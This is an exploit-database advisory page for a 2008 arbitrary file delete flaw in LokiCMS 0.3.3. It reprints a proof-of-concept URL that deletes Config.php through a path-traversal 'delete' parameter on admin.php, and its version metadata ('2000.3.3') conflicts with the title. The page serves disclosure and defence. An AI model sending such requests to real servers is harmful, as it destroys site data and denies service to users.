header-logo
Suggest Exploit
vendor:
LokiCMS
by:
cOndemned
7.5
CVSS
HIGH
Arbitrary File Delete
22
CWE
Product Name: LokiCMS
Affected Version From: 2000.3.3
Affected Version To: 2000.3.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

LokiCMS 0.3.3 <= Arbitrary File Delete Vulnerability

LokiCMS 0.3.3 is vulnerable to an arbitrary file delete vulnerability. An attacker can delete any file on the server by sending a specially crafted HTTP request to the admin.php page. This can be used to delete critical files such as the Config.php file, which will cause users to be unable to view the index page normally and will only see errors.

Mitigation:

Upgrade to the latest version of LokiCMS.
Source

Exploit-DB raw data:

Name   : LokiCMS 0.3.3 <= Arbitrary File Delete Vulnerability
Author : cOndemned
Greetz : ZaBeaTy, GregStar, irk4z, doctor, Avantura ;*
    
Usage:

    http://[target]/[lokiCMS]/admin.php?delete=[path]/[file]
        
PoC:

    http://[target]/[lokiCMS]/admin.php?delete=../includes/Config.php
       
    Deleting Config.php will casue situation when users won't be able to view index page
    normally. Only errors will be visible...

# milw0rm.com [2008-04-29]

Navigation

Suggest Exploit

Services By CQR